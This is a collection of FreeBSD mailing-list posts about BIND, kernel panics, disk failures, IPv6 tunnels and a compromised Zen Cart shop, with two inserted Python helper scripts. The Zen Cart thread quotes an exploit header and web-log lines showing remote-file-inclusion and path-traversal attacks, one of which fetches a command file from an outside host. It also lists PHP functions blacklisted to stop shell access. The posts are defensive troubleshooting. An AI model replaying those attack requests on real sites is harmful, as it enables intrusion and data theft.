Re: BIND Refusing to Resolve for External Hosts
uhm, here's my named.conf (it's a bit lightweight) but it works...

    // $FreeBSD: src/etc/namedb/named.conf,v 1.26.2.2.4.1 2009/04/15 03:14:26 kensmith Exp $

    options {
        directory       "/etc/namedb/namedwritable";   // made dir writable to bind user
        pid-file        "/var/run/named/pid";
        dump-file       "/var/dump/named_dump.db";
        statistics-file "/var/stats/named.stats";

        //listen-on { 127.0.0.1; };

        disable-empty-zone "255.255.255.255.IN-ADDR.ARPA";
        disable-empty-zone "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
        disable-empty-zone "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";

        forwarders {
            8.8.8.8; 8.8.4.4; 62.231.76.49; 81.18.85.7; 4.2.2.4; 208.67.222.222; 208.67.220.220;
            213.154.124.1; 193.231.252.1; 4.2.2.1; 4.2.2.2; 4.2.2.3; 4.2.2.5; 4.2.2.6;
            151.197.0.38; 151.197.0.39; 151.202.0.84; 151.202.0.85; 151.202.0.85; 151.203.0.84; 151.203.0.85;
            199.45.32.37; 199.45.32.38; 199.45.32.40; 199.45.32.43; 192.76.85.133; 206.124.64.1;
            67.138.54.100; 220.233.167.31; 199.166.31.3; 66.93.87.2; 216.231.41.2; 216.254.95.2;
            64.81.45.2; 64.81.111.2; 64.81.127.2; 64.81.79.2; 64.81.159.2; 66.92.64.2; 66.92.224.2;
            66.92.159.2; 64.81.79.2; 64.81.159.2; 64.81.127.2; 64.81.45.2; 216.27.175.2; 66.92.159.2;
            66.93.87.2; 199.2.252.10; 204.97.212.10; 204.117.214.10; 64.102.255.44; 128.107.241.185;
            156.154.70.1; 156.154.71.1;
        };
    };

    zone "." { type hint; file "../named.root"; };

    zone "pgn.ro" {
        type master;
        file "../master/pgn.ro.zone";   // master dir writable to bind user
        allow-transfer { localhost; };
        allow-update { key rndc-key; };
    };

    zone "pvp.ro" {
        type master;
        file "../master/pvp.ro.zone";
        allow-transfer { localhost; };
        allow-update { key rndc-key; };
    };

    zone "pnl-mioveni.ro" {
        type master;
        file "../master/pnl-mioveni.ro.zone";
        allow-transfer { localhost; };
        allow-update { key rndc-key; };
    };

    zone "chiritamarian.ro" {
        type master;
        file "../master/chiritamarian.ro.zone";
        allow-transfer { localhost; };
        allow-update { key rndc-key; };
    };

    key "rndc-key" {
        algorithm hmac-md5;
        secret "XX";
    };

___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
FreeBSD 8.0 linux emulator kernel panic
I'm having issues with the Fedora Core6 Linux emulator on FreeBSD 8.0: it panics when I run HLDS. The same issue was addressed by Daniel Ballenger in http://lists.freebsd.org/pipermail/freebsd-stable/2010-February/054646.html but I did not get the fix. Giovanni Trematerra gave a response that it was fixed in r200768; now it is clear that I do not know what that code means (in my eyes it's a BSD build or smth), but I'm currently running the latest 8.0-RELEASE-p3 available.

Please advise on how to patch the kernel panic.
Issues reinstalling Bind9 on FreeBSD 8.0
Ok, I'll make it short coz it's the 2nd time I write this -.-' and don't even ask why :D

So here it goes: fresh FreeBSD 8.0 install, installed bind97, on which I busted up the named.conf fine and thought, at the time, that deleting the whole content of /etc/namedb and reinstalling the bind port would simply write the files up again. Well, it's not like that... I did pkg_delete, make deinstall, make rmconfig, tried to manually delete all the files required, but no joy.

Now I've tried to use all of bind9, bind96 and bind97 from ports, and even got the source from isc.org, but they all did the same. Even more, after a reboot and again the same process (source + ports), the builds didn't even install the named binary:

    /etc/rc.d/named: WARNING: run_rc_command: cannot run /usr/sbin/named

Please do tell me how to completely purge a port, delete all its files and configs, then install it again from scratch... I'm using a 64bit FreeBSD 8.0 on AMD Athlon X2.

Best regards,
Bogdan.
sata hdd issues, timeouts'n'failures
Hi .. I'll be straight to the point: yesterday morning I experienced some issues with my FreeBSD 7.2 p7 regarding HDD partition error messages. It all started a week ago when, out of the blue, a few phpBB3 database tables got corrupted, and upon reading the messages in /var/log I saw:

    May 3 09:34:36 pgn kernel: ad10: WARNING - WRITE_DMA UDMA ICRC error (retrying request) LBA=143694719
    May 3 09:34:40 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=234746399
    May 3 09:35:20 pgn kernel: ad10: WARNING - WRITE_DMA UDMA ICRC error (retrying request) LBA=17996279
    May 3 09:35:27 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=140791775
    May 3 09:35:32 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=14029855

a whole bunch of those about 1 minute apart.

    May 3 09:47:09 pgn kernel: swap_pager: indefinite wait buffer: bufobj: 0, blkno: 5, size: 32768
    []
    May 3 09:48:46 pgn kernel: ad10: FAILURE - WRITE_DMA timed out LBA=14741375
    May 3 09:48:46 pgn kernel:
    May 3 09:48:46 pgn kernel: g_vfs_done():ad10s1d[WRITE(offset=2715713536, length=16384)]error = 5
    [.]

until the system became very slow and hard to use. I've rebooted a few times, tried to boot into single user mode and run fsck, but the issues still occur..

Now the GEOM_LABEL renames the ufsids, timeouts still occur, and today ended up with

    May 4 15:26:24 pgn kernel: fsync: giving up on dirty
    May 4 15:26:24 pgn kernel: 0xff000395a7e0: tag devfs, type VCHR
    May 4 15:26:24 pgn kernel: usecount 1, writecount 0, refcount 934 mountedhere 0xff0003879c00
    May 4 15:26:24 pgn kernel: flags ()
    May 4 15:26:24 pgn kernel: v_object 0xff0003923e58 ref 0 pages 3725
    May 4 15:26:24 pgn kernel: lock type devfs: EXCL (count 1) by thread 0xff00117e6370 (pid 1181)
    May 4 15:26:24 pgn kernel: dev ad10s1f
    May 4 15:26:40 pgn fsck: /dev/ad10s1f: CANNOT CREATE SNAPSHOT /usr/.snap/fsck_snapshot: Resource temporarily unavailable
    May 4 15:26:40 pgn fsck:
    May 4 15:26:40 pgn fsck: /dev/ad10s1f: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.

Please advise, it's pretty serious. I googled around but sincerely it's such a big issue that it can't wait :( thanks!

p.s.
whole /var/log/messages: http://pastebin.com/KcF3ziYu
system info (df -h, uname, fstab, etc.): http://pastebin.com/dK8UKfhT
Re: sata hdd issues, timeouts'n'failures
replacing the disk is easy, I'm still curious why this has happened and if it's indeed a hardware issue...

now I've tried to install sysutils/smartmontools and the box simply crashed 2 times (one recovery and the last one dead'n'buried). It cracked when it got to

    === Checking if sysutils/smartmontools already installed
    Making install in .
    test -z /usr/local/sbin || ./install-sh -c -d /usr/local/sbin
    install -s -o root -g wheel -m 555 smartd smartctl '/usr/local/sbin'
    test -z /usr/local/etc || ./install-sh -c -d /usr/local/etc
    install -o root -g wheel -m 444 smartd.conf.sample '/usr/local/etc'

the ping got to 1300ms then the box froze...
Info on DOS mitigation, kernel configuration for DOS mitigation
Hello everyone!

First of all I would like to apologize to anyone who finds my appeal a lazy man's choice; actually it's indeed lazy, but it's the best way to get an answer from a valid source.

My problem is a potential DOS/DDOS... I know, a forever talked about issue... I've already searched FreeBSD's mailing lists and found some mitigation techniques; too bad that google ain't that familiar with FreeBSD, and searchin' for guides is a pain... I recall finding a mitigation technique that involved bandwidth shaping and other ... I'm using FreeBSD 7.2-p7 with ipfw, and upon testing the rules in those guides it alerted me that bandwidth modules weren't included in the BSD kernel...

Anyway, could anyone provide me with a good BSD walkthrough for DOS mitigation and, if needed, kernel modules and kernel module integration, maybe another firewall (but with an extended howto..) ... (basically anything related to floods)

Thanks in advance!
Re: HELP! Is that possible creating a user named root but actually not the administrator root
Edit the /etc/master.passwd and /etc/passwd records to change the uid and gid of the root account, BUT FIRST MAKE SURE YOU ADD (or change the password of) ANOTHER UID0 ACCOUNT.

Here's an example:

/etc/master.passwd:

    root:*PASSWORD HASH*:99:99::0:0:Charlie &:/root:/bin/csh

and /etc/passwd:

    root:*:99:99:Charlie &:/root:/bin/csh

Check the toor account: it's already created by FreeBSD but it doesn't have a password. First apply a password for that account, triple check that it's usable, then edit the records (keep in mind that the 99 uid and 99 gid in my examples are fake; try giving yours the uid and gid of the nobody account, or some other).

cheers!

2010/2/11 Anthony M. Rasat anthony.ra...@gmail.com

> Lin Taosheng wrote:
>> Is that possible to implemented?
>
> No. I think not. But I have not tried it either. Can I ask what do you want to achieve? Because I had the same thought once, concerning how to combat once-increasing script-driven SSH brute-force attack. But I was instead have a better solution using fail2ban to easily thwart those SSH brute force attack. Is that your situation?
>
> Regards,
> Anthony M. Rasat
> Manager - Technical, Network and Support Division
> PT. Jawa Pos National Network
> Graha Pena Jawa Pos Group Building, 5th floor
> Jln. Raya Kebayoran Lama 12, Jakarta Selatan 12210 Indonesia.-
> Phone 02132185562
> Phone 081574217035
> Fax 02153651465
> Web http://www.jpnn.com
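The pre-check that the reply above insists on (another UID 0 account that can actually log in before root's uid is edited), as an added example that is not part of the original post. The function names and both sample files are constructed for illustration; the field layout is the ten-field master.passwd format.

```python
# Hypothetical pre-flight check, run against a copy of /etc/master.passwd.
FIELDS = ("name", "password", "uid", "gid", "class", "change",
          "expire", "gecos", "home", "shell")

def parse_master_passwd(text):
    """Parse master.passwd text into a list of dicts, one per account."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"expected {len(FIELDS)} fields: {raw!r}")
        entry = dict(zip(FIELDS, parts))
        entry["uid"] = int(entry["uid"])
        entries.append(entry)
    return entries

def has_usable_password(entry):
    """A real hash is required: '' means passwordless, '*...' means no valid hash."""
    pw = entry["password"]
    return pw != "" and not pw.startswith("*")

def usable_uid0_fallbacks(text, account="root"):
    """Names of UID 0 accounts other than `account` that can still log in."""
    return [
        e["name"] for e in parse_master_passwd(text)
        if e["uid"] == 0 and e["name"] != account
        and has_usable_password(e)
        and not e["shell"].endswith("nologin")
    ]

# Constructed samples: toor as shipped (no password), then with one set.
BEFORE = """\
root:$6$CONSTRUCTED$ROOTHASH:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
"""
AFTER = BEFORE.replace("toor:*:", "toor:$6$CONSTRUCTED$TOORHASH:")

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        names = usable_uid0_fallbacks(text)
        print(label, "->", names or "NO fallback: do not edit root yet")
```

An empty result means editing root's uid would leave no way back to UID 0 short of single-user mode.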
Re: Server compromised Zen-Cart record company Exploit
try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin, but the addon not the patch... and define the suhosin.executor.func.blacklist which will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken...

stay safe !

ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php

2010/1/31 James Smallacombe u...@3.am

> Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unprivileged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble)
>
> Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these:
>
>     www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl)
>     www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl)
>     www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl)
>     www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84
>
> I could not find ANY file named klogd on the system, let alone in /sbin.
>
> Clues as to how to dig myself out of this are appreciated
>
> I found this in /tmp/bx1.txt:
>
>     --More--(5%)#!/usr/bin/php
>     ?php
>     #
>     # --- Zen Cart 1.3.8 Remote Code Execution
>     # http://www.zen-cart.com/
>     # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
>     # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
>     #
>     # BlackH :)
>     #
>     error_reporting(E_ALL ^ E_NOTICE);
>     if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1);
>     --- snipped --
>
> It is dated from two nights ago, after these issues started, but it's nonetheless alarming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is, this is an old version of Zen cart, and the
>
> James Smallacombe
> PlantageNet, Inc. CEO and Janitor
> u...@3.am http://3.am
Re: Server compromised Zen-Cart record company Exploit
Indeed it's pretty tricky with safe_mode, like for certain I know that a version of a popular r57 shell had safe_mode bypass - I was stunned to check the shell myself on my server... and I was thinking that safe_mode is enough... (+ I was using the Suhosin patch *which in fact does nothing regarding straightening the php)

then I came over Suhosin the addon (which on my BSD with lighttpd could be loaded only using Zen framework... for unknown reasons to me). Suhosin was configured to blacklist some basic commands that allow php to directly run shell commands:

    suhosin.executor.func.blacklist = proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec

thus even if hackers find bugs in some php apps it would be harder to get a shell... I say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's

here's some examples on how Suhosin alerts the attacks:

    Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home//pgnlinks/index.php')
    Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531)

*note - these are logs from /var/log/messages and the last message is a false-positive (I think it's called that way), it's a basic function of SMF board to check the DNS with a linux command, but I just wanted to point out how it handles the blacklist...

here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd):

    2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php')
    2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php')

    189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0 (compatible; Indy Library)
    189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0 (compatible; Indy Library)
    189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library)
    189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library)

My server has safe_mode off - bcoz it's not needed (at least in my mind... I might be mistaken) and check out the phpinfo.php file I've got and see the Suhosin settings

stay safe!
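A log triage pass over the two formats quoted in the post above (Suhosin ALERT lines and access-log requests), as an added example that is not part of the original message. All names are hypothetical and the sample lines are constructed, with documentation addresses in place of real ones; it counts alert kinds and suspicious query values per client and lists blacklist call sites so false positives like the SMF one can be reviewed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl
# Suhosin alert: ALERT - <msg> (attacker '<ip>', file '<path>'[, line <n>])
ALERT_RE = re.compile(
    r"ALERT - (?P<msg>.*?) \(attacker '(?P<ip>[^']+)', "
    r"file '(?P<file>[^']*)'(?:, line (?P<line>\d+))?\)")
# Access log: <ip> <vhost> - [<time>] <METHOD> <target> HTTP/1.x <status>
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "?[A-Z]+ (?P<target>.+?) HTTP/\d\.\d"? \d{3}')
ALERT_KINDS = (
    ("function within blacklist called", "suhosin:blacklisted-function"),
    ("tried to register forbidden variable", "suhosin:forbidden-variable"),
    ("ASCII-NUL chars not allowed", "suhosin:nul-byte"))

def classify_alert(msg):
    return next((lab for key, lab in ALERT_KINDS if key in msg), "suhosin:other")

def classify_request(target):
    """Label suspicious query-string values in one request target."""
    labels = set()
    query = target.partition("?")[2]
    for _name, value in parse_qsl(query, keep_blank_values=True):
        value = value.strip()
        if "\x00" in value:  # %00 decodes to a NUL byte
            labels.add("request:nul-byte")
        if "../" in value:
            labels.add("request:path-traversal")
        if re.match(r"(?i)(?:https?|ftp)://", value):
            labels.add("request:remote-url")
    return labels

def summarize(lines):
    """Return (labels counted per client IP, blacklist hits per call site)."""
    per_ip, call_sites = defaultdict(Counter), Counter()
    for line in lines:
        alert = ALERT_RE.search(line)
        if alert:
            kind = classify_alert(alert["msg"])
            per_ip[alert["ip"]][kind] += 1
            if kind == "suhosin:blacklisted-function":
                # A call site recurring in trusted code is a false-positive candidate.
                call_sites[(alert["file"], alert["line"])] += 1
            continue
        request = REQUEST_RE.match(line)
        if request:
            for label in classify_request(request["target"]):
                per_ip[request["ip"]][label] += 1
    return per_ip, call_sites

# Constructed sample lines in the formats quoted above (documentation addresses).
SAMPLE = [
    "Jan  2 02:17:00 host suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '192.0.2.10', file '/usr/home/site/index.php')",
    "Dec 16 23:43:36 host suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '198.51.100.7', file '/usr/home/site/forum/Sources/Subs.php', line 3531)",
    "2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '192.0.2.10', file '/usr/home/site/index.php')",
    "192.0.2.10 www.example.org - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://files.example.net/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0",
    "192.0.2.10 www.example.org - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0",
    "198.51.100.7 www.example.org - [19/Jan/2010:02:25:00 +0200] GET /forum/index.php?topic=12 HTTP/1.1 200 5120 - Mozilla/5.0",
]

if __name__ == "__main__":
    for ip, counts in sorted(summarize(SAMPLE)[0].items()):
        print(ip, dict(counts))
```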
FreeBSD ipv6 rc.conf settings issue
I'm having problems with the /etc/rc.conf setup of an ipv6 tunnel on my FreeBSD 7.2-RELEASE-p6. It's a particular issue with the ipv6_defaultrouter config, it just does not work... Upon network and routing restart ipv6 is enabled, the gif interfaces are given IPs and everything, but the defaultrouter does not. Researching a bit I found some say that gif1 should work and tried both ipv6_defaultrouter="-interface gif1" and ipv6_defaultrouter="2001:0470:1f0a:d40::1" but no joy...

here is the basic command line config from tunnelbroker.net: http://pastebin.ca/1736599

here's the rc.conf:

    defaultrouter="86.122.121.129"
    gateway_enable="YES"
    hostname="pgn.ro"
    ifconfig_nfe0=inet . [...]
    ipv6_enable="YES"
    ipv6_network_interfaces="lo0 gif1"
    ipv6_gateway_enable="YES"
    gif_interfaces="gif1"
    gifconfig_gif1="86.122.121.171 216.66.80.30"
    ipv6_ifconfig_gif1="2001:0470:1f0a:d40::2/64"
    ipv6_defaultrouter="-interface gif1"
    [...]

after that I do a quick network restart: http://pastebin.ca/1736601

as ipv6 does not work I use route to add the gateway: http://pastebin.ca/1736604
Re: FreeBSD ipv6 rc.conf settings issue
Some point out rc.local as a fix, I find it ok too but it has some ups'n'downs. Indeed, in a reboot situation rc.local having the route add command would be ok, but in a short network restart it wouldn't count (as I particularly value my uptime)... the ipv6 defaultroute is not a big issue for me, as I do not depend on it so much, but I find it somewhat important to FreeBSD ... dunno, I like to know that a distro is stable in any case (not that I'm complaining about FreeBSD)

reference: http://www.tunnelbroker.net/forums/index.php?topic=734.0

2010/1/7 Steve Bertrand st...@ibctech.ca

> Bogdan Webb wrote:
>> I'm having problems with the /etc/rc.conf setup of an ipv6 tunnel on my FreeBSD 7.2-RELEASE-p6. It's a particular issue with the ipv6_defaultrouter config, it just does not work... Upon network and routing restart ipv6 is enabled, the gif interfaces are given IPs and everything, but the defaultrouter does not. Researching a bit I found some say that gif1 should work and tried both ipv6_defaultrouter="-interface gif1" and ipv6_defaultrouter="2001:0470:1f0a:d40::1"
>
> This issue is not limited to gif interfaces... I've had this exact same problem on ALL of my FreeBSD hosts for, well, since ever. No matter what I've tried, if a box reboots, I must manually enter in the default IPv6 router. Even on IPv6-only hosts, the default gateway does not take upon reboot.
>
> I'm up for figuring this issue out today, if nobody else has a solution for you. Let me know. If you're interested, I'll fire up a couple of hosts that we can use and just continuously reboot if necessary :)
>
> Steve
FreeBSD 7.2 savecore panic
Hello. I've got a small issue with my bsd box... I'm a new BSD user and please accept my deepest apologies if I have rushed to use the mailing lists to shout what may be a silly issue.

During the 3 months the server that I manage had 2 unexpected reboots after some ports were about to be installed. The first time I wasn't paying much attention to the process and can't tell exactly what caused the panic (it was certainly port install related) but I've paid close attention to this 2nd time. The server runs FreeBSD 7.2-RELEASE #0 on an amd64 arch and it cracked when I tried to install portmanager from the /usr/ports/ports-mgmt/portmanager tree using the basic 'make install clean' command. Previously I had made the steps of updating the portsnap collection in order to keep my box up2date.

Out of nowhere bsd crashed, and using google I've managed to get some info about crash logs:

    ./messages:Oct 20 00:13:25 pgn savecore: reboot after panic: page fault

/var/crash/info.0

    Dump header from device /dev/ad10s1b
      Architecture: amd64
      Architecture Version: 2
      Dump Length: 426561536B (406 MB)
      Blocksize: 512
      Dumptime: Thu Sep 10 18:36:20 2009
      Hostname: pvp.ro
      Magic: FreeBSD Kernel Dump
      Version String: FreeBSD 7.2-RELEASE #0: Fri May 1 07:18:07 UTC 2009
        r...@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
      Panic String: page fault
      Dump Parity: 2499253002
      Bounds: 0
      Dump Status: good

    pgn# uname -a
    FreeBSD pgn.ro 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 07:18:07 UTC 2009 r...@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

saw some other topics related to issues like this and they pointed out tinkering with the

    rc.conf:dumpdev=AUTO
    rc.conf:savecore_flags=

But if I would prolly know what I'm to do I wouldn't write this long dumb help request :)

What's wrong with my bsd box (which I'm in love with so much now) and how can I prevent it from panicking